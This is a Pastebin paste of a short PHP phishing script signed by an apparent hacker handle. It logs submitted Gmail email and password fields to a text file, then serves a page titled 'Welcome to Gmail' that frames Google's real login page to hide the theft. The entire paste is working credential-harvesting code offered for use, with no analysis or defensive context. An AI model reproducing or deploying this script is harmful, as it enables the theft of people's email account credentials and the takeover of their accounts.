Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?php /* Created on: 5/08/2011 By: Spid3rB0il66*/
  2. $fp = fopen("password.txt", "a");
  3. fwrite($fp, "Username:$_POST[Email]\tPassword:$_POST[Passwd]");
  4. echo "<HTML>
  5.  
  6. <head>
  7. <title>Welcome to Gmail</title>
  8. <FRAMESET cols=\"*\">
  9.  <FRAME SRC=\"https://www.google.com/accounts/ServiceLoginAuth\">
  10.  
  11.  
  12.  
  13.  
  14.  
  15. </FRAMESET>";?>
  16.  
  17.  
  18.